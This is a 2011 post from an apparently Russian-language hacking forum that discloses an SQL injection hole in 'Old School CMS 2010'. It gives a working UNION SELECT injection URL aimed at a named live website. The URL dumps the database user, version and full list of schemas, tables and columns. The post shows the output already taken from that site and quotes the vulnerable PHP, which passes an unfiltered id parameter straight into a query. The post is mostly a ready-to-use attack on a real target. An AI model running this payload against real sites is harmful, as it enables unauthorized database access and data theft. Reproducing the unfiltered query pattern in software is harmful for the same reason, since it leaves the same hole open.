Показать сообщение отдельно

  #8  
Старый 10.10.2011, 18:28
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Old School CMS 2010

root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb

Цитата:
Сообщение от None  
http://www.vsevbanu.ru/post.php?id=-82+UnIon+selECt+1,concat_ws(0x3a,user(),version(), database()),(select(@x)from(select(@x:=0x00),(sele ct(0)from(information_schema.columns)where(table_s chema!=0x696e666f726d6174696f6e5f736368656d61)and( 0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10+--+
Уязвимость пресутствует из-за отсутствия фильтрации данных в парамитре ID

post.php

Цитата:
Сообщение от None  
if(!empty($_GET['id'])){$id =
$_GET['id']
;}
else $id = 1;
$show = $_GET['show'];
// вывод содержимого страницы;
$sql = "SELECT * FROM `pora` WHERE id =
$id
AND type = 'art'";
$result = mysql_query($sql);
$cont = mysql_fetch_object($result);
 
Ответить с цитированием